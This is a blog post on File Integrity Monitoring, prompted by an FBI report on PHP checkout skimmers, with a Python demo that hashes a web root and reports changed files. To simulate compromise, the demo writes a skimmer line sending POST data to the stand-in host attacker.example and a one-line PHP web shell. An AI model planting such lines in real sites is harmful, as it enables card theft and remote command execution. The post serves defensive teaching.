
FIM (File Integrity Monitoring): Protecting Customers’ Credit Card Data

There’s FOMO (Fear of Missing Out) and then there’s FIM (File Integrity Monitoring). You do not want to miss out on understanding what FIM is all about and why the FBI (Federal Bureau Of Investigation) is concerned.

The FBI Cyber Division recently released a FLASH report stating that cyber actors have been unlawfully scraping credit card data from US businesses’ online checkout pages. The actors inject malicious PHP Hypertext Preprocessor (PHP) code into e-commerce websites’ checkout pages, and the scraped card data is sent to an actor-controlled server that spoofs a legitimate card processing server.

To mitigate the threat these actors pose by compromising US business online checkout pages to steal credit card information, the FBI recommends that companies with checkout pages:

  • Update and patch all systems, including operating systems, software, and any third-party code running as part of your website.
  • Change default login credentials on all systems.
  • Monitor requests performed against your e-commerce environment to identify possible malicious activity.
  • Segregate and segment network systems to limit how easily cyber criminals can move from one to another.
  • Secure all websites transferring sensitive information with SSL/TLS (in practice a current TLS version, since SSL itself is obsolete and should be disabled).

In addition, I suggest running File Integrity Monitoring (FIM) technology to detect file changes that could indicate a cyberattack. Also known as change monitoring, FIM examines files to determine whether and when they change, what changed, and who changed them. A baseline of cryptographic hashes is taken while the site is known-good, and any later deviation, such as new code appended to a checkout page or an unexpected PHP file appearing in an upload directory, is reported.
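The following is an added example, not code from the original post or from any FIM product: a minimal Python file-integrity monitor that builds a SHA-256 baseline of a web root and then reports added, removed and modified files. The web root, the appended skimmer line and the host name attacker.example are all constructed for the demo and are not real.

```python
"""
Minimal file-integrity monitor: snapshot a directory tree, persist the
snapshot, then compare the live tree against it and report changes.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in 64 KiB chunks so large files need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict:
    """Snapshot every regular file under root: SHA-256, size and permission
    bits, keyed by POSIX-style relative path so the baseline is portable."""
    snapshot = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and not path.is_symlink():
            st = path.stat()
            snapshot[path.relative_to(root).as_posix()] = {
                "sha256": sha256_file(path),
                "size": st.st_size,
                "mode": oct(st.st_mode & 0o777),
            }
    return snapshot


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots into added / removed / modified relative paths.
    Any content change alters the hash; mode is compared as well so that a
    permission change alone (e.g. a checkout page made world-writable) is flagged."""
    old, new = set(baseline), set(current)
    return {
        "added": sorted(new - old),
        "removed": sorted(old - new),
        "modified": sorted(f for f in old & new if baseline[f] != current[f]),
    }


def demo() -> dict:
    """Constructed scenario (not real data): baseline a small web root, then
    simulate an attacker appending a skimmer to checkout.php, dropping a web
    shell and deleting a stylesheet. Returns the change report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "checkout").mkdir()
        (root / "checkout" / "checkout.php").write_text("<?php /* legitimate checkout */ ?>\n")
        (root / "index.php").write_text("<?php echo 'shop'; ?>\n")
        (root / "css").mkdir()
        (root / "css" / "site.css").write_text("body { margin: 0 }\n")

        # Persist the baseline as JSON. In production keep it off the web host
        # (or signed) so an intruder cannot rewrite it along with the site.
        stored = json.dumps(build_baseline(root), indent=2)

        # Simulated compromise. The exfiltration host is a made-up name.
        with (root / "checkout" / "checkout.php").open("a") as fh:
            fh.write("<?php file_get_contents('https://attacker.example/c?' "
                     ". http_build_query($_POST)); ?>\n")
        (root / "uploads").mkdir()
        (root / "uploads" / "shell.php").write_text("<?php system($_GET['cmd']); ?>\n")
        (root / "css" / "site.css").unlink()

        return compare(json.loads(stored), build_baseline(root))


if __name__ == "__main__":
    report = demo()
    for kind in ("added", "removed", "modified"):
        for f in report[kind]:
            print(f"{kind.upper():9} {f}")
```

Run it on a schedule (cron) or drive it from inotify, alert on any change under the checkout paths and third-party JavaScript, and allow-list directories that legitimately churn (logs, caches, session stores) so the alerts stay actionable. Keep the baseline off the monitored host: a baseline that an attacker can rewrite is no baseline at all.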

If you are running a website, especially one which transacts funds, and if you do not have File Integrity Monitoring (FIM) implemented, I do not want to shop on your website. Furthermore, you are going to get pummeled by bad actors because you do not have your house in order!

It is a well-known fact that credit card data has always been one of the crown jewels for fraudsters. Remember Magecart attacks? And GraphQL API authorization?

It’s fascinating to me when a business has card data compromised while battle-tested measures could easily have been put in place. Understanding the technical controls your organization and associated Nth parties have in place to defend against fundamental attacks is an imperative in the world of e-commerce.